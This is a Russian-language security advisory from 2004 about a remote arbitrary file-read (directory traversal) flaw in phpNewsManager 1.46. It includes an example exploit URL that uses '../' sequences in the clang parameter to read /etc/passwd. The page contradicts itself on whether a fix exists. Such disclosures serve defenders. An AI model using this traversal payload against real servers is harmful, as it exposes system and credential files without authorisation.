Security Lab

Удаленный просмотр произвольных файлов в phpNewsManager

Дата публикации:25.02.2004
Всего просмотров:824
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Раскрытие важных данных
Раскрытие системных данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: phpNewsManager 1.x
Уязвимые версии: phpNewsManager 1.46

Описание: Уязвимость обнаружена в phpNewsManager. Удаленный пользователь может просматривать произвольные файлы на системе.

Пример/Эксплоит:

http://[target]/directory/functions.php?clang=../../../../../../../../../../../../etc/passwd

URL производителя: http://www.skintech.org/newman/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: ZH2004-09SA (security advisory): PhpNewsManager Remote arbitrary